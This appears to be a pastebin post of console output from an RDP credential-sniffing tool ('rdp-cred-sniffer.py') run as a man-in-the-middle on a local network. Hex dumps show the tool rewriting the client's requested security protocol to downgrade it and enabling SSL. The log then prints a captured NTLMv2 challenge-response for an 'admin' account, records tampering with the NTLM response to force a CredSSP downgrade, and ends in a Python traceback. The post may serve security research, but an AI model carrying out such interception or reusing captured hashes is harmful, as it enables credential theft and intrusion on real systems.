
Untitled

a guest
Apr 15th, 2017
Waiting for connection
Connection received from 192.168.1.144
From client:
00000000: 03 00 00 2B 26 E0 00 00 00 00 00 43 6F 6F 6B 69 ...+&......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 61 64 6D 69 e: mstshash=admi
00000020: 6E 0D 0A 01 00 08 00 0B 00 00 00 n..........
Downgrading authentication options from 11 to 3
From client: (modified)
00000000: 03 00 00 2B 26 E0 00 00 00 00 00 43 6F 6F 6B 69 ...+&......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 61 64 6D 69 e: mstshash=admi
00000020: 6E 0D 0A 01 00 08 00 03 00 00 00 n..........
From server:
00000000: 03 00 00 13 0E D0 00 00 12 34 00 02 1F 08 00 02 .........4......
00000010: 00 00 00 ...
Enable SSL
From client:
00000000: 30 37 A0 03 02 01 02 A1 30 30 2E 30 2C A0 2A 04 07......00.0,.*.
00000010: 28 4E 54 4C 4D 53 53 50 00 01 00 00 00 B7 82 08 (NTLMSSP........
00000020: E2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 06 01 B1 1D 00 00 00 0F .........
From server:
Server challenge: e20c22806c9d8ca7
From client:
admin::admin-PC:e20c22806c9d8ca7:0539d1e9d0a0d6dfaa48cb008063d1da:01010000000000009162ff0649b6d201b304086171ac507a0000000002001e004400450053004b0054004f0050002d004a0056005100300032004c00510001001e004400450053004b0054004f0050002d004a0056005100300032004c00510004001e004400450053004b0054004f0050002d004a0056005100300032004c00510003001e004400450053004b0054004f0050002d004a0056005100300032004c005100070008009162ff0649b6d20106000400020000000800300030000000000000000100000000200000be212520d50f938f8f25dcd5a336cbcd2264c0f8bbbf8904b77b53c937a48cf90a0010000000000000000000000000000000000009002a005400450052004d005300520056002f003100390032002e003100360038002e0031002e00310032003800000000000000000000000000
Tamper with NTLM response
From client: (modified)
TLS alert access denied, Downgrading CredSSP
Waiting for connection
Connection received from 192.168.1.144
From client:
00000000: 03 00 00 2B 26 E0 00 00 00 00 00 43 6F 6F 6B 69 ...+&......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 61 64 6D 69 e: mstshash=admi
00000020: 6E 0D 0A 01 00 08 00 01 00 00 00 n..........
From server:
00000000: 03 00 00 13 0E D0 00 00 12 34 00 03 00 08 00 05 .........4......
00000010: 00 00 00 ...
Enable SSL
Connection lost
Traceback (most recent call last):
  File "./rdp-cred-sniffer.py", line 800, in <module>
    run()
  File "./rdp-cred-sniffer.py", line 785, in run
    if not forward_data():
  File "./rdp-cred-sniffer.py", line 737, in forward_data
    readable, _, _ = select.select([local_conn, remote_socket], [], [])
ValueError: file descriptor cannot be a negative integer (-1)